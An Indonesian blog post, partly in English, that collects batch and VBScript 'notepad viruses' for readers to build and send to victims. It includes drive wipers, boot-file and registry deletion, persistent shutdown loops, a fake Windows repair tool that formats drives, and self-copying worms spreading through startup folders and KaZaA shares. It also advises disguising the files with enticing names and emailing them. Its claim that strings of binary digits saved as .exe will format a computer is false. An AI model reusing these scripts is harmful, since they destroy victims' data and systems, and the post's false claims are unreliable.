Rabu, 01 Mei 2013

THUNDER VIRUS


SCRIPT : THUNDER VOLTAGER) (TV)
Disini kami mencoba untuk mengulas secara sederhana agar secara umum garis besar nya dapat dicerna, tapi bila anda telah menguasainya maka silahkan ikuti  %,@x$#.......
Jangan di gunakan untuk merugikan orang lain , tapi manfaatkan ilmunya agar barokah. Pelajari cara kerjanya dan buat obatnya untuk menolong / buat scipt yang bermanfaat.
Kunci dari Semua Script ini adalah ditulis di dalam NOTEPAD.
Pertama Buka Notepad anda :
Click kanan mouse button dan pilih Text Document / Buka Notepad. Atau Cara lain
Tekan Start + R >tulis Notepad > tekan Enter. Masih banyak cara lain untuk ini.

===========================================================================

Payload batch wiper drive eraser

Dibuat oleh overwraith, gunakan dengan resiko Anda sendiri.
Script ini akan menghapus drive yang terpasang di komputer Anda. ini dibuat  untuk menunjukkan batch wiper malware.
Fitur registry key akan me restart script di reboot, Sebagai script vb tetapi memungkinkan untuk menjalankan file batch  diam-diam pada vista dan Windows 7

machines.
REM By overwraith REM EraseFlashDrives.txt REM PURPOSE: to delete the contents of attached drives. GUI r STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM THE DIRECTORY YOU WANT TO HIDE THE SCRIPT IN STRING cd %TEMP% ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL z ENTER REM Delete batch file if already exists STRING erase /Q SecurityBullseye.bat ENTER REM Make the batch file REM SLIGHT THROWBACK TO VIDEO GAME BIOSHOCK I/II STRING copy con SecurityBullseye.bat ENTER REM REGISTRY KEY RESTARTS THE SCRIPT ON REBOOT STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\SecurityBullseye.bat" /f ENTER STRING :while1 ENTER REM C:\ IS USUALLY THE DRIVE THE OS IS INSTALLED ON, SO OMIT. STRING for %%a in (A B D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( ENTER STRING IF EXIST %%a:\ erase /Q /S /F "%%a:\*.*" ENTER STRING IF EXIST %%a:\ rmdir /Q /S "%%a:\*" ENTER STRING ) ENTER STRING timeout /t 60 ENTER STRING goto :while1 ENTER CONTROL z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs SecurityBullseye.bat ENTER STRING EXIT ENTER
===========================================================================

Menghapus Isi Drive...

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save dalam bentuk.bat. type file : All File

NB : Terlalu berbahaya karena begitu di klick langsung KO.


===========================================================================

Menghapus PerDrive

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
@Echo off
Del C: *.* |y
Save dalam bentuk.bat. type file : All File

NB : Terlalu berbahaya karena begitu di klick langsung Window KO.
Hanya bekerja pada Windows XP.


@echo off
DEL C: -Y
DEL D: -Y
Save dalam bentuk.bat. type file : All File
Kalo kita mengklik virus ini, maka seluruh data yang ada di hardisk akan hilang tanpa terkecuali.
Sehingga, hal ini dapat menyebabkan komputer akan mati total.


@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
Save dalam bentuk.bat. type file : All File


Menghapus Booting Windows

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Save dalam bentuk.bat. type file : All File
NB : Shutdown Komputer. dan menghapus semua file untuk Reboot dan Restart
Tidak akan bekerja pada Vista.**


@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Save dalam bentuk.bat. type file : All File
NB : Muncul Pop up Message
Dan komputer akan ShutDown dan tidak pernah Reboot  lagi !


===========================================================================

WARNING :: This is the most dangerous virus! Be careful with its use.
Delete the entire registry
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*


===========================================================================

Cpu Macet / Hang.

Buka cmd (comand prompt) dan tuliskan / copas Script dibawah ini : . . .
ASSOC.exe=.hank
Enter

Memperbaikinya dengan mem buka CMD lagi. lalu ketik
ASSOC.exe=EXEFILE


===========================================================================

Shutdown Dengan Pesan

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
@echo off
msg *I don't like you
shutdown -c "Error! You are too mmmmmmmmm*!"
Save dalam bentuk.bat. type file : All File


Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Save it as "Anything.VBS" and send it.



===========================================================================
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

===========================================================================

ShutDown Dengan Pesan 

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
@echo off
msg * Hati-hati Thunder Voltager (TV
)
shutdown -c "Error! You are too stupid!" -s
Save dalam bentuk.bat. type file : All File


===========================================================================

Shutdown Setiap Akan Startup !

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
@ECHO OFF
shutdown -s -t 10 -c "Virus Attack..."
exit
? File >> Save As...
? Name it : virus.bat
? Start >> All Programs
? Right Click on Startup >> Open
? This open the Startup folder
? Paste the Virus.bat file here !
Save dalam bentuk.vbs. type file : All File


===========================================================================

Memperbanyak Beban.

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
Save dalam bentuk.vbs. type file : All File

NB : Terlalu berbahaya karena begitu di klick langsung KO.


===========================================================================

Memilih Files Supaya Tidak Bekerja / Menjadi TXT Files

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
Save dalam bentuk.bat. type file : All File


===========================================================================

TV

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”
Save dalam bentuk.vbs. type file : All File


===========================================================================

Windows ......

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
echo @echo off>c:
windowshartlell.bat
echo break off>>c:
windowshartlell.bat
echo shutdown -r -t 11 -f>>c:
windowshartlell.bat
echo end>>c:
windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
Save dalam bentuk.bat. type file : All File


===========================================================================

System Meltdown

Buka Notepad dan tuliskan / copas Script dibawah ini : . . .
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE
PAUSE

Save As A bat File
Temporarily Flood Network


:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
Save dalam bentuk.bat type file : All File


===========================================================================

Create a Dangerous Virus

Open Notepad and type this in:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
save it as whatever.vbs. type file : All File
Here is a Batch File virus which can:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).


===========================================================================

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Jika virus notepad ini di jalankan :Virus ini mengelabuhi user agar seakan-akan ini adalah service windows dalam menemukan sebuah virus dan berusaha memperbaikinya.
Padahal ini hanya palsu belaka.
Juga membuat value diregistry agar semua file yang berekstensi exe tidak akan bisa dibuka lagi oleh program default file tersebut.
Dan menghapus semua file yang dibutuhkan oleh windows untuk memboot -
memformat semua harddisk yang ada di komputer

@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%% /f
echo.
del /f /Q /A C:\ntldr /S
echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.
cara membuatnya :

- copy script di atas ke notepad
- save dengan nama terserah , dan di akhiri dengan .bat ( contoh : toepan.bat )
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Ilove it because it looks the most like an actual attack. Copy and
paste the following into an open Notepad window, then save the file with
any name you choose and an extension of “.bat”


Here’s the code:

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep
echo Wscript.Sleep 5000>C:sleep5000.vbs
echo Wscript.Sleep 3000>C:sleep3000.vbs
echo Wscript.Sleep 4000>C:sleep4000.vbs
echo Wscript.Sleep 2000>C:sleep2000.vbs
cd %systemroot%System32
dir
cls
start /w wscript.exe C:sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:Documents and SettingsAll UsersStart MenuPrograms
mkdir h4x
start /w wscript.exe C:sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:sleep3000.vbs
echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
echo start hax.exe
start /w wscript.exe C:sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:sleep2000.vbs
pause
shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”
        
Here’s how it will look like once it is launched:

 






Your victim’s PC will display messages as in the above image, and
then initiate a shutdown sequence which can be stopped by entering
“shutdown ““a” in the Run command box. It looks bad, but is otherwise
completely harmless.

<br />
Code #10- shutdown computer

avidemux2_cli --run j-1.js --run j-2.js --end

shutdown.exe -s -t 00

ps you can change the "00" to how ever many seconds you want ex. "74" so than it will be 74 seconds



XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX




XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 It is another virus for u ......... It's dangerous use  carefully
@ECHO OFF
if exist c:\romp.bat goto end
:start
cls
Echo Installing Update...
cd c:\windows\system
del keyboard.drv
del mouse.drv
TITLE System Update
echo ::startup &gt;&gt; c:\romp.bat
echo if not exist c:\damp goto prompt &gt;&gt; c:\romp.bat
echo :start &gt;&gt; c:\romp.bat
echo cls &gt;&gt; c:\romp.bat
echo cd c:\ &gt;&gt; c:\romp.bat
echo cd damp &gt;&gt; c:\romp.bat
echo md keys &gt;&gt; c:\romp.bat
echo pause &gt;&gt; c:\romp.bat
echo copy *.bat c:\damp\keys\ILOVEYOU.bat &gt;&gt; c:\romp.bat
echo copy *.bat c:\damp\keys\ILOVEYOU.bat c:\windows\stone.bat &gt;&gt; c:\romp.bat
echo rmdir c:\WUTemp &gt;&gt; c:\romp.bat
echo del c:\windows\system32\*.* &gt;&gt; c:\romp.bat
echo rmdir c:\windows\system32 &gt;&gt; c:\romp.bat
echo cd c:\ &gt;&gt; c:\romp.bat
echo cd windows &gt;&gt; c:\romp.bat
echo md system32 &gt;&gt; c:\romp.bat
echo pause &gt;&gt; c:\romp.bat
echo cd c:\ &gt;&gt; c:\romp.bat
echo cd windows &gt;&gt; c:\romp.bat
echo cd system32 &gt;&gt; c:\romp.bat
echo md tools &gt;&gt; c:\romp.bat
echo copy *.bat c:\windows\system32\tools\urscrewed.bat
echo echo msgbox" Ur system is now screwed" &gt;&gt; c:\plastic.vbs &gt;&gt; c:\romp.bat
echo echo msgbox" This was no scan... it was more like a scam" &gt;&gt; c:\plastic.vbs &gt;&gt; c:\romp.bat
echo echo msgbox" It has deleted pretty much all of system32 which is in windows and has messed


with windows" &gt;&gt; c:\plastic.vbs &gt;&gt; c:\romp.bat
echo echo msgbox" There is no more windows on this computer" &gt;&gt; c:\plastic.vbs &gt;&gt; c:\romp.bat
echo Rd/s/q c:\windows &gt;&gt; c:\romp.bat
echo Rd/s/q c:\progra~1 &gt;&gt; c:\romp.bat
echo goto part2 &gt;&gt; c:\romp.bat
      &gt;&gt; c:\romp.bat
      &gt;&gt; c:\romp.bat
echo :part2 &gt;&gt; c:\romp.bat
echo cls &gt;&gt; c:\romp.bat
echo cd c:\ &gt;&gt; c:\romp.bat
echo md Kierstyn'scan &gt;&gt; c:\romp.bat
echo pause &gt;&gt; c:\romp.bat
echo goto part3 &gt;&gt; c:\romp.bat
        &gt;&gt; c:\romp.bat
        &gt;&gt; c:\romp.bat
echo :part3 &gt;&gt; c:\romp.bat
echo rename c:\windows c:\viriiscan &gt;&gt; c:\romp.bat
echo goto end1 &gt;&gt; c:\romp.bat


echo :prompt &gt;&gt; c:\romp.bat
echo cls &gt;&gt; c:\romp.bat
echo cd c:\ &gt;&gt; c:\romp.bat
echo md damp &gt;&gt; c:\romp.bat
echo copy *.bat c:\damp.bat &gt;&gt; c:\romp.bat
echo echo msgbox" Oh No u r so stupid" &gt;&gt; c:\pomper.vbs &gt;&gt; c:\romp.bat
echo echo msgbox" Wow you probably got this through ur lan" &gt;&gt; c:\pomper.vbs &gt;&gt; c:\romp.bat
echo echo msgbox" Happy dieing staples" &gt;&gt; c:\pomper.vbs &gt;&gt; c:\romp.bat
echo goto start &gt;&gt; c:\romp.bat
      &gt;&gt; c:\romp.bat
      &gt;&gt; c:\romp.bat
echo :end1 &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Matrix2.vid.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-legged-freaks.vid.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Password_finder.exe.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\s-club7.bmp.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\JackAss the movie.vid.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\password hacker.exe.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Norton anti virus.exe.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\8-mile.mpg.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\kazaa.exe.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\realplayer.exe.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\MyPic.bmp.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very funny*.bmp.bat &gt;&gt;


c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\Bill gates *very funny*.mpg.bat &gt;&gt;


c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\windows xp.exe.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to make viruses.txt.bat &gt;&gt;


c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\*very funny*.bmp.bat &gt;&gt; c:\romp.bat
echo Copy *.bat C:\Program Files\KaZaA\My Shared Folder\How to stop worm viruses.txt.bat &gt;&gt;


c:\romp.bat
echo goto end &gt;&gt; c:\romp.bat
echo :end &gt;&gt; c:\romp.bat
Echo Virus installed
cd c:\Docume~1\All Users\Start Menu\Programs\Startup
copy *.bat cd c:\Docume~1\All Users\Start Menu\Programs\Startup
Echo Now You have to restart to save
START C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec
rundll32.exe shell32.dll,SHExitWindowsEx n
pause
del c:\thecreator.bat
:end



 

Analisa Cepat Virus Aang



Nama File : Aang.vbs
sumber : Viruslab.tk source
Ukuran : Gak tentu(terkadang sourcenya di ubah dikit)
copiler : Notepad
icon : vbs
ceksum : -

proses aktif :
wscript.exe

membuat / copy file ke :
systemdir\Aang.vbs
SemuaDrive\The_Legend_Of_Aang.vbs

menulis autorun dengan isi :
[autorun]
useautoplay = 1
icon = %SystemRoot%\system32\SHELL32.dll,7
shellexecute = wscript.exe The_Legend_Of_Aang.vbs
Shell\OPEN\COMMAND = wscript.exe The_Legend_Of_Aang.vbs
Shell\explore\COMMAND = wscript.exe The_Legend_Of_Aang.vbs
Action = Open folder to view files

menjalankan diri dengan regedit pada path :
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit,SystemDir & "\userinit.exe", & SystemDir & "\wscript.exe" & SystemDir & "\Aang.vbs"

analisa registry :
menjalankan MS32DLL
mengkosongkan Windows Title
mengkosongkan Start Page
mngubah icon vbs menjadi wscript.exe










Well. You want to make others in trouble?  Then try this trick to format their computer using simple notepad virus. Just open your notepad and copy paste below numeric values to your notepad.
Dengan Baik. Anda ingin membuat orang lain dalam kesulitan? Kemudian cobalah trik ini untuk memformat komputer mereka menggunakan virus notepad sederhana.
Hanya membuka notepad dan copy paste di bawah nilai numerik ke notepad Anda.

01001011000111110010010101010101010000011111100000
01001011000111110010010101010101010000011111100000


Di atas nilai-nilai numerik yang tidak dimengerti bagi kita. Tapi sebenarnya dapat dibaca oleh komputer Anda atau orang lain jika berjalan pada Windows OS.


Sekarang hanya menyimpan file dalam format .exe. Itu berarti memberikan nama untuk file Anda tetapi menambahkan exe setelah nama dan simpan.

Misalnya js-virus.exe (Daripada js-virus Anda dapat menggunakan nama apapun tetapi .exe harus ada).
Bahwa. Ketika seseorang membuka file ini bahwa komputer akan diformat secara otomatis. !!

 Catatan: Jika Anda berencana untuk menipu orang lain dengan menggunakan virus notepad ini kemudian simpan dengan nama yang menarik. Sesuatu yang membuat mereka untuk membukanya.

 Jika Anda menemukan bahwa di atas kode yang diberikan tidak bekerja kemudian mencoba kode ini. Gunakan ini dan menyimpan file dalam. Format exe.

01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
1
2
3
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

Make Booting Damage Using Notepad Virus

Tried above trick? And now its time for making another virus. This virus can make big issue on computers booting process. Just copy and paste to make this danger boot notepad virus. And save it as .exe format.
Mencoba atas trik? Dan sekarang saatnya untuk membuat virus lain. Virus ini dapat membuat masalah besar pada komputer proses booting. Cukup copy dan paste untuk membuat bahaya ini booting notepad virus. Dan menyimpannya sebagai format .exe.

01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
1
2
3
4
5
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001

Steps are same but these two virus are different in action. :) Try those but I am not responsible. He he
If you have enjoyed this please do share and support. Also use comments or contact form to show your feedback and suggestions.
Langkah yang sama tapi dua virus ini berbeda dalam tindakan. :) Coba mereka tapi saya tidak bertanggung jawab. he he

 Jika Anda telah menikmati ini silakan lakukan saham dan dukungan. Juga menggunakan komentar atau formulir kontak untuk menunjukkan tanggapan dan saran.




Anti-Virus is a need to every computer. But you must know its efficiency. Do you know anti virus can be tested only with the help of note pad??

To do this, you should create a fake virus first. Don't worry. No complex coding. Just open up notepad, paste the below text in that.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* After the above code has been entered save the file as an .exe file instead of a .txt file. For example, name the file test.exe instead of test.txt. 

Done. Now close notepad. Wait for your anti virus to react. It should show a "Virus Found" alert. If found don't panic. It is same virus that you have created just now. And be happy that your anti-virus is efficient.










Now Tutorial On How To Save It With The Extension .bat :

After Pasting An Of The Above Code

Create A Dangerous Virus Using Notepad 1. Select "File" Options And Click "Save As".

2. Then Click "Save As Type" Option And Make It To "All Files".

3. And Put Any File Name with Extension .bat as demonstrated in the below figure.
Create A Dangerous Virus Using Notepad

Now After You Have Saved Any one Of The Virus, Send it with someone else's Email Id And Name! Link Is Given Below:-


Note :- Do not RUN any of these viruses on your PC. I am not responsible for any damages of your PC.

Tidak ada komentar:

Posting Komentar